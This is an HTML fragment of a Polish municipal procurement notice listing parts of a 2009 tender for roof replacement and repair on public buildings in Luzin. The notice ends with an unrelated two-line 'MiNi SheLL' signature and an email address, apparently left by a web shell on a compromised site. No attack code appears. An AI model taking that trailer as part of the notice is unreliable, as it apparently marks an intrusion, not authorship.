<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiana pokrycia dachowego z płyt azbestowo-cementowych na blacho dachówkę na budynku Szkoły Podstawowej w Luzinie, przy ul. Ofiar Stutthofu 13.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.10-9, 45.26.26.60-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część czwarta: Remont dachu na budynku Domu Nauczyciela w Luzinie, przy ul. Szkolnej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont dachu na budynku Domu Nauczyciela w Luzinie, przy ul. Szkolnej.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.10-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część piąta: Wymiana pokrycia dachowego z płyt azbestowo-cementowych na blacho dachówkę  na budynku Urzędu Gminy przy ul.  Wilczka.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiana pokrycia dachowego z płyt azbestowo-cementowych na blacho dachówkę  na budynku Urzędu Gminy przy ul.  Wilczka.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.10-9, 45.26.26.60-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com